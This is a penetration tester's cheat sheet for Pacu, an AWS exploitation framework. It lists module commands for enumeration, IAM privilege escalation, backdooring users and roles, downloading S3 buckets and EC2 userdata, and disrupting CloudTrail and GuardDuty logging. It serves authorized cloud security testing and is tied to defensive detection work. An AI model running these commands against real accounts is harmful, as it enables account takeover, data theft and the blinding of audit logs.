← All cheat sheets

PACU

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Pacu (Rhino Security Labs) is an open-source AWS exploitation framework.
It organises offensive AWS testing into modules for enumeration,
privilege escalation, persistence, and exfiltration against a set of
compromised credentials. Authorized cloud engagements only.

SESSION & CREDENTIALS#

pacu                                            # Launch the console
> new_session <name>                            # Create a session
> set_keys                                        # Add AWS access keys
> swap_keys                                       # Switch key sets
> whoami                                          # Show current identity
> import_keys default                             # Import from AWS CLI profile

MODULE WORKFLOW#

> ls                                              # List all modules
> search <keyword>                                # Find modules
> help <module>                                   # Module help
> run <module> [args]                             # Execute a module
> data                                            # Show gathered data

ENUMERATION MODULES#

> run iam__enum_users_roles_policies_groups       # IAM inventory
> run iam__enum_permissions                        # Effective permissions
> run ec2__enum                                    # EC2 instances/volumes
> run s3__enum                                      # S3 buckets
> run lambda__enum                                 # Lambda functions
> run enum__secrets                                # Secrets Manager / SSM
> run iam__bruteforce_permissions                  # Probe allowed actions

PRIVILEGE ESCALATION#

> run iam__privesc_scan                            # Find + exploit privesc
# Enumerates known IAM escalation paths (CreatePolicyVersion,
# PassRole+RunInstances, AttachUserPolicy, UpdateLoginProfile, etc.)
# and can auto-exploit with --offline / scan-only options

PERSISTENCE / BACKDOOR#

> run iam__backdoor_users_keys                     # Add access keys to users
> run iam__backdoor_assume_role                    # Backdoor role trust
> run ec2__backdoor_ec2_sec_groups                 # Open security groups

DATA EXFIL / RECON#

> run s3__download_bucket                           # Pull bucket contents
> run ec2__download_userdata                        # EC2 userdata (secrets)
> run cloudtrail__download_event_history            # Grab CloudTrail
> run detection__enum_services                       # Find logging/GuardDuty

EVASION / LOGGING#

> run detection__disruption                          # Disrupt CloudTrail/GD
> run cloudtrail__csv_injection
# NOTE: disabling logging is high-impact; only within explicit RoE

EXAMPLES#

# Stand up a session, import CLI keys, map identity + permissions
pacu
> new_session bank-test
> import_keys default
> whoami
> run iam__enum_permissions

# Hunt and (scan-only) report IAM privilege-escalation paths
> run iam__privesc_scan

# Enumerate exposed S3 and pull an in-scope bucket
> run s3__enum
> run s3__download_bucket

NOTES#

- Pacu operates on ALREADY-COMPROMISED AWS keys - it is post-access
  cloud exploitation, not initial access
- iam__privesc_scan is the flagship: it maps the same escalation
  chains your AWS-DETECTION sheet watches for on the blue side
- Detection/disruption modules can blind CloudTrail/GuardDuty - these
  are destructive; require explicit written authorization
- Pairs with AWS-DETECTION.txt (defensive view) and complements your
  existing AWS-IAM-PRIVESC, SCOUTSUITE, PROWLER sheets (audit side)
- For LU FS clients, cloud attack paths map to DORA ICT third-party
  risk and CSSF cloud-outsourcing findings